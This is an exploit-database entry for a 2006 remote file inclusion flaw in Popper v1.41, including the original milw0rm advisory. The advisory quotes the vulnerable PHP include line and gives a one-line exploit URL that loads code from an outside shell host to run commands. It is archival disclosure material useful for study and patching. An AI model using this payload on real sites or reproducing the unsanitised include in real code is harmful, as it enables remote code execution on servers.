header-logo
Suggest Exploit
vendor:
Popper
by:
SHiKaA
N/A
CVSS
N/A
Remote File Inclusion
98
CWE
Product Name: Popper
Affected Version From: v1.41
Affected Version To: v1.41
Patch Exists: YES
Related CWE: N/A
CPE: a:popper:popper
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Popper <= v1.41 (form) Remote File Inclusion Exploit

A vulnerability exists in Popper v1.41 which allows remote attackers to include arbitrary files via a URL in the form parameter to childwindow.inc.php. This can be exploited to execute arbitrary PHP code by including a URL pointing to a malicious PHP script.

Mitigation:

Upgrade to the latest version of Popper.
Source

Exploit-DB raw data:

#==============================================================================================
#Popper <= v1.41 (form) Remote File Inclusion Exploit
#===============================================================================================
#                                                                      
#Critical Level : Dangerous                                            
#                                                                      
#Venedor site : http://popper.ractive.ch/      
#                                                                      
#Version : v1.41                                             
#
#================================================================================================
#Bug in : childwindow.inc.php
#
#Vlu Code :
#--------------------------------
#
#     <?php include($form.".form.inc.php");?>
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/childwindow.inc.php?form=http://SHELLURL.COM?&cmd=id
#
#================================================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#GreetZ : CCtream - Cyper-worrier team
# Special Thx To : Str0ke & simoo
==================================================================================================

# milw0rm.com [2006-09-12]